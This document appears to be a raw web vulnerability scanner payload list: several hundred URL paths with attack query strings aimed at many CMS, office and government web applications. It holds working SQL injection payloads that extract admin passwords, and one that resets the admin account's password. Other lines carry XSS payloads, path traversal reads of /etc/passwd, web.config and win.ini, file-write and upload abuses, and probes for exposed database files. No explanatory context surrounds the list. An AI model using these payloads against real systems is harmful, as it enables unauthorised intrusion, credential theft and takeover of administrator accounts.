/ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
/count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
/ajax.php?action=contentpage
/comments.php?id=3a&tablepre=boka_ckck
/rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
//wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
/admin/index.php?_m=../template/css/login.css%00&_a=admin_list
/case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
/login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
/info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
/ajax.php?action=letter&letter=a
/index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
/index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
/index.php/Index/index/name/$%7B@print(md5(1122))%7D
/index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
/index.php?m=payment&s=admin/pickupmod
/admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
/user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
/servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
/mep-admin/DcServlet
/mep-admin/userAction!queryUser.action?start=0&limit=10
/admin/picupload.aspx
/manager/picupload.aspx
/microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
/TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
/admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
/index.php?c=tj&f=include&js=/../../config.php
/index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
/api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
/radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
/system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
/styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
/web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
/forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/Ajax_Handle/UploadAttachmentHandler.ashx
/Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
/Ajax_Handle/UploadPictureHandler.ashx
/Ajax_Handle/UploadLocalVideoHandler.ashx
/index.php?m=api&a=userpreview
/index.php?m=Appmanager&a=loadapp
/CMSUploadFile.aspx
/api/shop.aspx
/sysinfo.jsp
/login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
/login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
/file/MyDownLoad.ashx?path=../web.config
/file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
/broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
/feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
/channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
/login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
/api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
/FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
/setup/setup1.jsp
/examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
/Article/?Type=18%20/**/and/**/1=char(106)--
/login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
/file/EmailDownload.ashx?url=~/web.config&name=web.config
/file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
/file/DownLoad.ashx?path=~/Routes.config
/file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
/file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
/download.jsp?path=WEB-INF/&name=web.xml
/page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
/mx_form/order_save.php
/index.php?app=tag&ac=add&ts=do
/member.php?act=index
/Article/?KeyWord=1'%20and%201=char(97)%20--
/apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
/admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
/Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
/Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
/Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
/Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
/jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
/jiep/down.jsp?pathfile=down.jsp%00.txt
/index.php?m=Goods&a=showcate&id=1'cfreer
/Goods-showcate-id-1.html'cfreer
/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
/jvideo/objectbox/selectx_userlist.jsp
/yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
/Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
/Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
/celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
/ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
/ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
/burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/oa_server/App_Pages/App_page/UserSpuerAdd.aspx
/oa_server/App_Pages/App_page/user_list.aspx
/cms/cms/site/cms_site_template_upload.jsp?action=save
/cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
/deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
/deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
/lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
/web/SubmitLogin.do
/pic.aspx?classid=60)%20and%201=char(106)%20--
/frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
/engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
/index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
/SRP2003/UserManage/sysuser/modifypage.asp?id=1
/venus/AsVenusCA/desk/message/reply.asp
/Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
/mx_form/order_save.php?form_id=5
/download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
/cms/web/testsql.jsp
/web/zwdt/jjj.BjcxServlet
/login.php?LOGIN_USER_INCLUDE=/etc/passwd
/cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/webUser/webUser!list.action
/logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/admin/annual/delete_leave.post.php
/admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
/admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
/admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
/down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
/jdwm/cgi/getpwd.cgi
/public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
/public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
/cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
/cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
/CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
/Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
/BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
/forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
/forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
/forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
/search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
/Ajax_Handle/UploadAttachmentHandler.ashx
/ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
/public/editext/up/soundsave.asp
/public/AspUpload/upload.asp?path=../../upload&processid=1
/xyEmployee_checkLoginForUser.do?userName=reer
/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
/kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
/kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
/kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
/picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
/opensoft.asp?%69d=10%20and%201=2
/phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
/bmsltxDetail.do
/setAcceptance.do
/setAcceptance.do
/setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/nobom.php
/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
/lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
/lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
/admin/Admin_Config.asp
/Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
/zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
/FileUpload
/oa_server/App_Pages/App_page/user_update.aspx?userid=172
/api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
/conformID.asp?Tid=jx'%20and%201=char(106)%20--
/DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
/KS_Data/KesionCMS6.mdb
/KS_Data/KesionCMS7.mdb
/KS_Data/KesionCMS8.mdb
/KS_Data/KesionCMS9.mdb
/conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
/Asearch.asp
/linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
/zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
/Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
/specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
/api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
/toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
/index.php?c=ajax&a=member_login&template=../../ooxx.php
/addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
/addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
/Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
/Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
/workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
/search.aspx
/servlet/fileOpenforms?filename=/index.jsp
/application/gzhd/bgxz/download.jsp?filename=/index.jsp
/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
/truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
/NewsList.asp
/ActivityList.asp
/WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
/common/guestbook.php
/common/help.php
/Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
/wap/index.php?a=newslist
/index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
/?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/admin/uploadFile.action
/Adminiscentertrator/AdmIndex.asp
/Adminiscentertrator/AdmLinkInsert.asp
/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/NewsList.asp
/bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
/zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
/prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
/prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
